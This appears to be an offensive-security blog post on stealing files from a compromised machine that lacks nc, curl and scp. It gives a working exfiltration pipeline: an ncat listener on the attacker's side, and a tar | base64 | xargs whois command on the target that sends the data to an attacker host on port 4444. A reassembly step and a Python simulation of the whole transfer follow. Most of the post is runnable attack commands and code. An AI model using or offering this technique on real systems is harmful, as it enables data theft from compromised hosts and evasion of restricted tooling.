Sometimes you need to pull (juicy) files off a remote system you have compromised, only to find that the box has very little tooling to work with: no nc, no curl, no scp.
What can you do?
I'll show you how, using the whois command.
Let's see…
STEP 1
On the attacker's terminal, type:
ncat -k -l -p 4444 | tee files.b64
Ncat listens on port 4444 for the target's connections; -k keeps it listening after the first client disconnects, which matters because every whois query arrives on a fresh connection. tee writes everything received to files.b64 while still echoing it to the terminal, so you can watch the chunks arrive.
Keep the sender sequential: with -k every client writes to the same stdout, so overlapping connections would interleave their chunks and corrupt the archive. When files.b64 stops growing the transfer is done; stop ncat with Ctrl-C.
On the target's terminal, type:
tar czf - /path/to/directory | base64 -w 2048 | xargs -L 1 timeout 0.03 whois -h attacker.machine.IP -p 4444
Compress the directory you want to transfer into a gzipped tar stream on stdout and base64-encode it, wrapping the text into lines of 2048 characters (base64 -w 2048). xargs -L 1 then runs one whois command per line: whois opens a TCP connection to the attacker's machine on port 4444 and sends the line as its query, terminated with CRLF, exactly as it would to a real whois server, and timeout kills it after 0.03 s because no answer is ever coming.
That is the whole trick: whois is a TCP client that will talk to any host and port with text you control, so it stands in for nc or curl when those are missing. On a slow link raise the timeout (a chunk is lost if whois is killed before it has finished sending), and use a port the target is actually allowed to reach.
STEP 2 (Final)
On the attacker's terminal, type:
cat files.b64 | tr -d '\r\n' | base64 -d | tar xvz
Read the received file (files.b64), which holds one base64 chunk per line, each followed by the CRLF whois appended to its query.
Strip those line endings with tr (base64 -d would reject the carriage returns).
Base64-decode the stream.
Then unpack the tar archive to recover the files.
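To see why the chunks reassemble cleanly, here is a self-contained round trip of the same pipeline in Python, added to this post as an illustration rather than taken from it. It packs a constructed set of files into a gzipped tar, base64-encodes them into 2048-character lines, and then plays both ends of the wire: a sender that does what the whois client does on each call (one TCP connection, the query followed by CRLF, then disconnect) and a receiver that does what ncat -k | tee does (accept connections in turn, keep every byte in arrival order), before reassembling exactly as Step 2 does. It runs over loopback with no whois or ncat installed; the file names, contents and the ephemeral port are constructed for the example and stand in for the real target directory and port 4444.

```python
"""Local round trip of the whois exfiltration pipeline (added example, not the post's code).

Both ends are simulated so this runs on loopback without whois or ncat installed:
 - pack_dir_b64:  tar czf - DIR | base64 -w WIDTH       (sender side, in memory)
 - whois_send:    what `whois -h HOST -p PORT QUERY` puts on the wire
 - receiver:      what `ncat -k -l -p PORT | tee files.b64` keeps
 - reassemble:    tr -d '\\r\\n' | base64 -d | tar xvz
"""
import base64
import hashlib
import io
import socket
import tarfile
import threading


def pack_dir_b64(files: dict, width: int = 2048) -> list:
    """Gzipped tar of an in-memory {name: bytes} tree, base64-encoded and split
    into lines of at most `width` characters (the role of `base64 -w`)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, data in sorted(files.items()):
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    b64 = base64.b64encode(buf.getvalue()).decode("ascii")
    return [b64[i:i + width] for i in range(0, len(b64), width)]


def whois_send(host: str, port: int, query: str) -> None:
    """The whois client on the wire: one TCP connection carrying the query plus
    CRLF (RFC 3912). The real client would then block waiting for an answer,
    which is why the post wraps it in `timeout`; here we simply disconnect."""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(query.encode("ascii") + b"\r\n")


def receiver(srv: socket.socket, n_conns: int, out: list) -> None:
    """Stand-in for `ncat -k -l | tee`: accept connections one after another and
    keep everything each client sent, line endings included, in arrival order."""
    for _ in range(n_conns):
        conn, _ = srv.accept()
        with conn:
            conn.settimeout(5)
            chunks = []
            while True:
                data = conn.recv(65536)
                if not data:          # client closed (or was killed by timeout)
                    break
                chunks.append(data)
            out.append(b"".join(chunks).decode("ascii"))


def reassemble(raw: list) -> dict:
    """Step 2 of the post: drop CR/LF, base64-decode, unpack the tarball."""
    joined = "".join(raw).replace("\r", "").replace("\n", "")
    blob = base64.b64decode(joined, validate=True)   # any stray junk would raise here
    files = {}
    with tarfile.open(fileobj=io.BytesIO(blob), mode="r:gz") as tar:
        for m in tar.getmembers():
            if m.isfile():
                files[m.name] = tar.extractfile(m).read()
    return files


def round_trip(files: dict, width: int = 2048) -> dict:
    """Run the whole pipeline over loopback and return what the attacker recovers."""
    lines = pack_dir_b64(files, width)
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))       # ephemeral port stands in for 4444
    srv.listen(16)
    srv.settimeout(10)
    port = srv.getsockname()[1]
    got = []
    t = threading.Thread(target=receiver, args=(srv, len(lines), got))
    t.start()
    for line in lines:               # xargs -L 1: one whois query per line, in order
        whois_send("127.0.0.1", port, line)
    t.join()
    srv.close()
    return reassemble(got)


# Constructed sample "directory": incompressible content so several chunks are needed.
SAMPLE_FILES = {
    "loot/secret.bin": b"".join(hashlib.sha256(bytes([i])).digest() for i in range(200)),
    "loot/notes.txt": b"constructed sample, not real data\n",
}

if __name__ == "__main__":
    recovered = round_trip(SAMPLE_FILES)
    print("chunks sent:", len(pack_dir_b64(SAMPLE_FILES)))
    print("archive intact:", recovered == SAMPLE_FILES)
```

The receiver keeps the CRLF from every query on purpose, mirroring what lands in files.b64; reassemble then removes it, which is the job tr does in Step 2. Because the sender opens its connections strictly one after another, the accept queue hands them to the receiver in the same order and the base64 text concatenates back into the original stream; a parallel sender would break that guarantee.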
Thanks! Made with ❤️